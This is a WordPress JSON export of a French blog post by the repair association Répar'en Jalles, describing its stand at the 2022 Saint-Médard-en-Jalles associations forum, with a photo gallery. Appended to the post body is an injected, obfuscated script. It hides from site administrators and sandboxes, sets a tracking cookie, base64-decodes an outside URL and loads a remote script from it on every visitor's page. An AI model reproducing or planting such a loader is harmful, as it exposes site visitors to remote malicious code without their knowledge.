{"id":1101,"date":"2022-09-10T10:00:09","date_gmt":"2022-09-10T08:00:09","guid":{"rendered":"http:\/\/reparenjalles.saintmedardasso.fr\/?p=1101"},"modified":"2026-02-17T15:52:32","modified_gmt":"2026-02-17T14:52:32","slug":"forum-des-assos-2022","status":"publish","type":"post","link":"https:\/\/reparenjalles.saintmedardasso.fr\/?p=1101","title":{"rendered":"Forum des Assos 2022"},"content":{"rendered":"<p style=\"text-align: justify;\">Comme chaque ann\u00e9e <strong>R\u00e9par&rsquo;en Jalles<\/strong> a particip\u00e9 au <strong>forum des associations\u00a0<\/strong> organis\u00e9 le <strong>9 septembre 2022<\/strong> \u00e0 partir de 17h30 par la municipalit\u00e9 de <strong>Saint-M\u00e9dard-en-Jalles<\/strong>.<\/p>\n<p style=\"text-align: justify;\">Cette ann\u00e9e notre stand \u00e9tait en ext\u00e9rieur sur la Place de la R\u00e9publique et, \u00e0 l&rsquo;inverse de l&rsquo;ann\u00e9e derni\u00e8re, &#8230; il n&rsquo;a pas plu.\u00a0 \ud83d\ude42<\/p>\n<p style=\"text-align: justify;\">Au cours de la soir\u00e9e 5 b\u00e9n\u00e9voles se sont relay\u00e9s pour tenir le stand et renseigner les nombreuses personnes int\u00e9ress\u00e9es par les objectifs de notre association.<\/p>\n<style type=\"text\/css\">\n#foogallery-gallery-1096.fg-justified .fg-item { margin-right: 5px; margin-bottom: 5px; }\n#foogallery-gallery-1096.fg-justified .fg-image { height: 80px; }<\/style>\n\t\t\t<div class=\"foogallery foogallery-container foogallery-justified foogallery-lightbox-foobox fg-justified fg-ready fg-light fg-border-thin fg-round-small fg-shadow-outline fg-loading-default fg-loaded-fade-in fg-hover-fade fg-hover-zoom2 fg-transparent-overlays\" id=\"foogallery-gallery-1096\" data-foogallery=\"{&quot;item&quot;:{&quot;showCaptionTitle&quot;:true,&quot;showCaptionDescription&quot;:false},&quot;lazy&quot;:true,&quot;template&quot;:{&quot;rowHeight&quot;:80,&quot;maxRowHeight&quot;:80,&quot;margins&quot;:5,&quot;align&quot;:&quot;center&quot;,&quot;lastRow&quot;:&quot;smart&quot;}}\" style=\"--fg-title-line-clamp: 0; --fg-description-line-clamp: 0;\" >\n\t<div class=\"fg-item fg-type-image fg-idle\"><figure class=\"fg-item-inner\"><a href=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2022\/09\/Forum-2022-1.jpg\" data-attachment-id=\"1094\" data-type=\"image\" class=\"fg-thumb\"><span class=\"fg-image-wrap\"><img decoding=\"async\" height=\"80\" width=\"109\" class=\"skip-lazy fg-image\" data-src-fg=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/cache\/2022\/09\/Forum-2022-1\/3183747946.jpg\" src=\"data:image\/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20width%3D%22109%22%20height%3D%2280%22%20viewBox%3D%220%200%20109%2080%22%3E%3C%2Fsvg%3E\" loading=\"eager\"><\/span><span class=\"fg-image-overlay\"><\/span><\/a><\/figure><div class=\"fg-loader\"><\/div><\/div><div class=\"fg-item fg-type-image fg-idle\"><figure class=\"fg-item-inner\"><a href=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2022\/09\/Forum-2022-2.jpg\" data-attachment-id=\"1093\" data-type=\"image\" class=\"fg-thumb\"><span class=\"fg-image-wrap\"><img decoding=\"async\" height=\"80\" width=\"125\" class=\"skip-lazy fg-image\" data-src-fg=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/cache\/2022\/09\/Forum-2022-2\/1087098174.jpg\" src=\"data:image\/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20width%3D%22125%22%20height%3D%2280%22%20viewBox%3D%220%200%20125%2080%22%3E%3C%2Fsvg%3E\" loading=\"eager\"><\/span><span class=\"fg-image-overlay\"><\/span><\/a><\/figure><div class=\"fg-loader\"><\/div><\/div><\/div>\n\n<hr \/>\n<p>&nbsp;<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Comme chaque ann\u00e9e R\u00e9par&rsquo;en Jalles a particip\u00e9 au forum des associations\u00a0 organis\u00e9 le 9 septembre 2022 \u00e0 partir de 17h30 par la municipalit\u00e9 de Saint-M\u00e9dard-en-Jalles. Cette ann\u00e9e notre stand \u00e9tait en ext\u00e9rieur sur la Place de la R\u00e9publique et, \u00e0 l&rsquo;inverse de l&rsquo;ann\u00e9e derni\u00e8re, &#8230; il n&rsquo;a pas plu.\u00a0 \ud83d\ude42 Au cours de la soir\u00e9e &hellip; <a href=\"https:\/\/reparenjalles.saintmedardasso.fr\/?p=1101\" class=\"more-link\">Continuer la lecture de <span class=\"screen-reader-text\">Forum des Assos 2022<\/span>  <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":6,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-1101","post","type-post","status-publish","format-standard","hentry","category-non-classe"],"_links":{"self":[{"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/posts\/1101","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1101"}],"version-history":[{"count":1,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/posts\/1101\/revisions"}],"predecessor-version":[{"id":2061,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/posts\/1101\/revisions\/2061"}],"wp:attachment":[{"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1101"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1101"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1101"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}